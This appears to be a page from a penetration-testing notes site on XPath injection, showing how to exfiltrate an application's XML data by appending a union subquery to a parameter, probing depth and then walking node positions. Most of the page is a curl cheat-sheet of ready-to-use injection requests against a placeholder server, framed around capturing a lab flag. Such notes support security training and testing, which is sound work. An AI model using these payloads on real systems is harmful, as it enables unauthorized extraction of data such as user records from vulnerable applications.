Advanced Data Exfiltration

When the application limits results (e.g., shows only first N matches), dump the XML by iterating: first discover schema depth, then walk positions.

1) Force empty original, append probing subquery

Set a term that returns no hits (e.g., q=SOMETHINGINVALID) and use f=<original>|/*[1] to probe from root.

GET /index.php?q=SOMETHINGINVALID&f=fullstreetname | /*[1] HTTP/1.1
Host: <host>

If the app expects a string and your subquery yields a node-set/array, output may be blank.
Increase depth until output changes to find the data subtree depth:
- /*[1] → nothing
- /*[1]/*[1] → nothing
- /*[1]/*[1]/*[1] → nothing
- /*[1]/*[1]/*[1]/*[1] → first visible value

2) Walk positions at the last level

Once depth D is found, iterate /*[k] at the last step to enumerate fields/children, then move leftwards to enumerate records.

Example (depth=4):

/*[1]/*[1]/*[1]/*[1] → first item field 1
/*[1]/*[1]/*[1]/*[2] → first item field 2
/*[1]/*[1]/*[1]/*[3] → first item field 3
Increment the penultimate index to move to item 2, repeat.

Curl Cheat-Sheet

# Depth probing from root (encode | as %7C)
curl "http://<SERVER_IP>:<PORT>/index.php?q=SOMETHINGINVALID&f=fullstreetname%7C/*[1]"

# Try deeper
curl "http://<SERVER_IP>:<PORT>/index.php?q=SOMETHINGINVALID&f=fullstreetname%7C/*[1]/*[1]"
curl "http://<SERVER_IP>:<PORT>/index.php?q=SOMETHINGINVALID&f=fullstreetname%7C/*[1]/*[1]/*[1]"
curl "http://<SERVER_IP>:<PORT>/index.php?q=SOMETHINGINVALID&f=fullstreetname%7C/*[1]/*[1]/*[1]/*[1]"

# Enumerate fields of the first record (last index)
curl "http://<SERVER_IP>:<PORT>/index.php?q=SOMETHINGINVALID&f=fullstreetname%7C/*[1]/*[1]/*[1]/*[1]"
curl "http://<SERVER_IP>:<PORT>/index.php?q=SOMETHINGINVALID&f=fullstreetname%7C/*[1]/*[1]/*[1]/*[2]"
curl "http://<SERVER_IP>:<PORT>/index.php?q=SOMETHINGINVALID&f=fullstreetname%7C/*[1]/*[1]/*[1]/*[3]"

# Move to the second record (increment penultimate index)
curl "http://<SERVER_IP>:<PORT>/index.php?q=SOMETHINGINVALID&f=fullstreetname%7C/*[1]/*[1]/*[2]/*[1]"

Example Targeting a Different Dataset

If the second top-level child holds another dataset (e.g., users), start at /*[1]/*[2] and repeat depth probing:

curl "http://<SERVER_IP>:<PORT>/index.php?q=SOMETHINGINVALID&f=fullstreetname%7C/*[1]/*[2]"
curl "http://<SERVER_IP>:<PORT>/index.php?q=SOMETHINGINVALID&f=fullstreetname%7C/*[1]/*[2]/*[1]/*[1]/*[1]"

Concrete lab-style locator

If the flag is at /*[1]/*[2]/*[3]/*[1]/*[3]:

q=INVALID&f=fullstreetname|/*[1]/*[2]/*[3]/*[1]/*[3]

Encoded curl:

curl "http://<SERVER_IP>:<PORT>/index.php?q=INVALID&f=fullstreetname%7C/*[1]/*[2]/*[3]/*[1]/*[3]"

Redact secrets/flags in notes; store them separately if needed.

PreviousData Exfiltration NextBlind Exploitation

Last updated 3 months ago

hashtag1) Force empty original, append probing subquery

hashtag2) Walk positions at the last level

hashtagCurl Cheat-Sheet

hashtagExample Targeting a Different Dataset

hashtagConcrete lab-style locator

1) Force empty original, append probing subquery

2) Walk positions at the last level

Curl Cheat-Sheet

Example Targeting a Different Dataset

Concrete lab-style locator